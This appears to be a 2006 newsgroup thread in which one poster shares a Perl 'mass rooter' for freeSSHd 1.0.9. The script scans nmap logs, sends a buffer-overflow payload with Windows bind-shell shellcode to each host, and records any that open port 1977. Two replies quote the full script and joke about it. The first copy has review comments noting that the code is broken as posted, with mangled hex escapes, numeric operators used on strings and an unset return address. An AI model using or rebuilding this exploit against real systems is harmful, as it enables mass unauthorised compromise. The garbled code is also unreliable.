freesshd 1.0.9 massr00ter

 
 
cyberstorm
 
      06-16-2006
Here is a freeSSHd mass rooter: it reads hosts from nmap portscan logs, grabs their SSH banner and then tries to exploit them. Have fun with
this tool:

#!/usr/bin/perl
# freeSSHd 1.0.9 "mass rooter" as posted to a newsgroup in June 2006.
# Reads nmap output (see main), grabs the banner on port 22 of each listed
# host and hands the host to exploit().
# NOTE(review): the script runs without `use strict`/`use warnings`, so every
# undeclared name it relies on ($ip, $proto, $eip, $banner, $i, $p, @o, ...)
# is silently created as a package global.

use Socket;
use IO::Socket::INET;

# Default target port.  main() later uses $port as its foreach variable.
my $port = '22';
# Ports looked for in the nmap log; only 22 is ever configured.
my @banner = (22);
# Banner printed at start-up (runtime string, reproduced verbatim).
my $info = "+++++++++++++++++++++++++++++++++++++++++++++ \n".
"+ +\n".
"+ freeSSHd 1.0.9 Mass r00ter +\n".
"+ +\n".
"+ Author: cyberstorm +\n".
"+ Contact: cyberstorm187[at]arcor.de +\n".
"+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
"+ +\n".
"+++++++++++++++++++++++++++++++++++++++++++++ \n";

# Raw payload bytes appended to the overflow buffer in exploit().
# NOTE(review): the "\ x24"-style sequences below are a forum/extraction
# artefact (a space inserted after the backslash).  Perl reads "\ " as a
# literal space followed by the text "x24", so as posted these strings do not
# contain the byte sequence the author intended.  The 0x07 0xb9 pair appears
# to correspond to port 1977 in network byte order, which is the port
# exploit() probes afterwards; the rest of the payload is not analysed here.
my $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
"\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";

print "$info";
# With no arguments the usage text is printed, but execution still falls
# through to main, whose while (<>) then blocks reading STDIN.
&usage if !@ARGV; &main;


# Walk the nmap log named on the command line (or STDIN) line by line.
# An "Interesting ports on host (ip):" line sets the current target; a
# following "22/tcp open" line triggers a banner grab of that target.
# NOTE(review): $ip, $proto, $i and $p are undeclared globals, and &stats
# is not defined anywhere in the posted script, so a full run ends with
# "Undefined subroutine &main::stats".
sub main {
while (<>) {
# Captures the parenthesised address from nmap's classic host header line.
if (/^Interesting ports on.*\((\S+)\):/) {
$ip = $1; $i++;
# Note: the foreach is not inside the if above; it runs for every line,
# so a port line seen before any host header is passed with $ip unset.
} foreach $port (@banner) {
# Matches e.g. "22/tcp open"; $1 is the protocol name fed to getprotobyname.
if (/^$port\/(\w+)\s+open/) {
$proto = $1; $p++;
&banner($ip, $port, $proto);
}
}
} &stats;
}

# Connect to $ip:$port and print whatever the service sends first (or the
# HTTP "Server:" header when $port is 80 - unreachable here, since only port
# 22 is configured in @banner).  Then decides whether to call exploit().
# NOTE(review): socket()/connect() are unchecked; for an unreachable host
# SOCK is never connected, <SOCK> yields undef and the script carries on.
# The bareword handle SOCK is shared with exploit().
sub banner {
my ($ip, $port, $proto) = @_;
print "$ip:$port\t=> ";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
connect(SOCK, sockaddr_in($port, inet_aton($ip)));
if ($port != 80) {
# Reads one line: for SSH this is the server's identification string.
$banner =<SOCK>;
close(SOCK);
print "$banner";
} else {
send(SOCK, "GET / HTTP/1.0\n\n", 0);
@o = <SOCK>;
close(SOCK);
foreach (@o) {
if (/Server:\s(.*)/) {
$banner = $1;
print "$banner";
}
}
}
# NOTE(review): `!=` is Perl's numeric inequality.  Both operands numify to
# 0 (with warnings, if enabled), so this condition is false for every
# banner and exploit() is never reached.  The evident intent was a string
# comparison that skips WeOnlyDo servers.
if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
&exploit($ip,$port,$proto);
}
}

# Send the overflow buffer to $ip:$port, wait a second, then probe TCP/1977
# to decide whether the payload opened a listener; hits are appended to
# ./freesshd.txt.
# NOTE(review): as written this never sends the intended payload.  Perl's
# `+` and `*` are numeric operators ("A" * 1055 evaluates to 0, and adding
# strings numifies them), each `my $buff` redeclares and masks the previous
# one, and $eip is never assigned anywhere in the script.  send() therefore
# transmits a short numeric string (in practice "0"), not the ~20 KB buffer
# the layout below suggests.
sub exploit {
my ($ip,$port,$proto) = @_;
# Pre-check that something still listens on 22; the handle is never closed
# and is dropped only when the sub returns.
if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
# The leading bytes spell "SSH-1.99-OpenSSH_3.4\n", followed by a fixed
# binary header.  The "\ x6e"/"\ x00" sequences are the same extraction
# artefact as in $shellcode (a space after the backslash).
my $buff =
"\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";

# Intended layout: 1055 bytes of padding, a return address ($eip, unset),
# 4 filler bytes, a 4-byte NOP sled, the payload, then 19021 bytes of
# trailer and CRLF.  See the NOTE above on why none of this is built.
my $buff = $buff + "A" * 1055;
my $buff = $buff + $eip;
my $buff = $buff + "yyyy";
my $buff = $buff + "\x90" * 4;
my $buff = $buff + $shellcode;
my $buff = $buff + "B" * 19021 + "\r\n";

print "[~] Try to connect to $ip\n";
# Unchecked socket()/connect(); reuses the bareword handle SOCK from banner().
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
connect(SOCK, sockaddr_in($port, inet_aton($ip)));
print "[~] Creating Buffer\n";
send(SOCK, $buff, 0);
close(SOCK);
print "[~] Send Buffer\n";
print "[~] checking ...\n";

# Treat an open TCP/1977 as a successful bind shell.  Any unrelated service
# already listening on 1977 produces a false positive here.
sleep(1);
if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
print "[~] YoU got an Shell\n".
"Connect over Telnet on Port 1977\n";
# Bareword handle, two-arg open, no error check; appends to the current
# working directory.
open(OUTPUT, '>>freesshd.txt');
print OUTPUT "$ip\n";
close(OUTPUT);
} else {
print "Sorry, Dude !\n";
}
}
}

# Print the one-line command synopsis to STDOUT.  Called from the top level
# when no input file was given on the command line.
sub usage {
    my $synopsis = "freesshd.pl <infile>\n";
    return print $synopsis;
}

 
Geordie Guy
 
      06-17-2006
cyberstorm wrote:
> Here is an freesshd massrooter it will be check and hack
> from the nmap portscan logs. Have Fun with
> this tool:
>
> #!/usr/bin/perl
>
> use Socket;
> use IO::Socket::INET;
>
> my $port = '22';
> my @banner = (22);
> my $info = "+++++++++++++++++++++++++++++++++++++++++++++ \n".
> "+ +\n".
> "+ freeSSHd 1.0.9 Mass r00ter +\n".
> "+ +\n".
> "+ Author: cyberstorm +\n".
> "+ Contact: cyberstorm187[at]arcor.de +\n".
> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
> "+ +\n".
> "+++++++++++++++++++++++++++++++++++++++++++++ \n";
>
> my $shellcode =
> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";
>
> print "$info";
> &usage if !@ARGV; &main;
>
>
> sub main {
> while (<>) {
> if (/^Interesting ports on.*\((\S+)\):/) {
> $ip = $1; $i++;
> } foreach $port (@banner) {
> if (/^$port\/(\w+)\s+open/) {
> $proto = $1; $p++;
> &banner($ip, $port, $proto);
> }
> }
> } &stats;
> }
>
> sub banner {
> my ($ip, $port, $proto) = @_;
> print "$ip:$port\t=> ";
> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
> if ($port != 80) {
> $banner =<SOCK>;
> close(SOCK);
> print "$banner";
> } else {
> send(SOCK, "GET / HTTP/1.0\n\n", 0);
> @o = <SOCK>;
> close(SOCK);
> foreach (@o) {
> if (/Server:\s(.*)/) {
> $banner = $1;
> print "$banner";
> }
> }
> }
> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
> &exploit($ip,$port,$proto);
> }
> }
>
> sub exploit {
> my ($ip,$port,$proto) = @_;
> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
> my $buff =
> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";
>
> my $buff = $buff + "A" * 1055;
> my $buff = $buff + $eip;
> my $buff = $buff + "yyyy";
> my $buff = $buff + "\x90" * 4;
> my $buff = $buff + $shellcode;
> my $buff = $buff + "B" * 19021 + "\r\n";
>
> print "[~] Try to connect to $ip\n";
> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
> print "[~] Creating Buffer\n";
> send(SOCK, $buff, 0);
> close(SOCK);
> print "[~] Send Buffer\n";
> print "[~] checking ...\n";
>
> sleep(1);
> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
> print "[~] YoU got an Shell\n".
> "Connect over Telnet on Port 1977\n";
> open(OUTPUT, '>>freesshd.txt');
> print OUTPUT "$ip\n";
> close(OUTPUT);
> } else {
> print "Sorry, Dude !\n";
> }
> }
> }
>
> sub usage {
> print "freesshd.pl <infile>\n";
> }
>

Keep it PRIVATE PRIVATE!!!
By posting it to a news group LOL
 
imhotep
 
      06-18-2006
Geordie Guy wrote:

> cyberstorm wrote:
>> Here is an freesshd massrooter it will be check and hack
>> from the nmap portscan logs. Have Fun with
>> this tool:
>>
>> #!/usr/bin/perl
>>
>> use Socket;
>> use IO::Socket::INET;
>>
>> my $port = '22';
>> my @banner = (22);
>> my $info = "+++++++++++++++++++++++++++++++++++++++++++++ \n".
>> "+ +\n".
>> "+ freeSSHd 1.0.9 Mass r00ter +\n".
>> "+ +\n".
>> "+ Author: cyberstorm +\n".
>> "+ Contact: cyberstorm187[at]arcor.de +\n".
>> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
>> "+ +\n".
>> "+++++++++++++++++++++++++++++++++++++++++++++ \n";
>>
>> my $shellcode =
>> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
>> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
>> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
>> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
>> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
>> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
>> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
>> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
>> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
>> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
>> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
>> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
>> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
>> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
>> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
>> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
>> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
>> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
>> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
>> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";
>>
>> print "$info";
>> &usage if !@ARGV; &main;
>>
>>
>> sub main {
>> while (<>) {
>> if (/^Interesting ports on.*\((\S+)\):/) {
>> $ip = $1; $i++;
>> } foreach $port (@banner) {
>> if (/^$port\/(\w+)\s+open/) {
>> $proto = $1; $p++;
>> &banner($ip, $port, $proto);
>> }
>> }
>> } &stats;
>> }
>>
>> sub banner {
>> my ($ip, $port, $proto) = @_;
>> print "$ip:$port\t=> ";
>> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
>> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
>> if ($port != 80) {
>> $banner =<SOCK>;
>> close(SOCK);
>> print "$banner";
>> } else {
>> send(SOCK, "GET / HTTP/1.0\n\n", 0);
>> @o = <SOCK>;
>> close(SOCK);
>> foreach (@o) {
>> if (/Server:\s(.*)/) {
>> $banner = $1;
>> print "$banner";
>> }
>> }
>> }
>> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
>> &exploit($ip,$port,$proto);
>> }
>> }
>>
>> sub exploit {
>> my ($ip,$port,$proto) = @_;
>> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
>> my $buff =
>> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
>> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";
>>
>> my $buff = $buff + "A" * 1055;
>> my $buff = $buff + $eip;
>> my $buff = $buff + "yyyy";
>> my $buff = $buff + "\x90" * 4;
>> my $buff = $buff + $shellcode;
>> my $buff = $buff + "B" * 19021 + "\r\n";
>>
>> print "[~] Try to connect to $ip\n";
>> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
>> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
>> print "[~] Creating Buffer\n";
>> send(SOCK, $buff, 0);
>> close(SOCK);
>> print "[~] Send Buffer\n";
>> print "[~] checking ...\n";
>>
>> sleep(1);
>> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
>> print "[~] YoU got an Shell\n".
>> "Connect over Telnet on Port 1977\n";
>> open(OUTPUT, '>>freesshd.txt');
>> print OUTPUT "$ip\n";
>> close(OUTPUT);
>> } else {
>> print "Sorry, Dude !\n";
>> }
>> }
>> }
>>
>> sub usage {
>> print "freesshd.pl <infile>\n";
>> }
>>

> Keep it PRIVATE PRIVATE!!!
> By posting it to a news group LOL



No, share, share, share!!!

Im
--
*************************************
Pass a Net Neutrality Law in the US!!!!

Save the Internet:
http://www.savetheinternet.com/

Its our net:
http://www.itsournet.org/

*************************************
 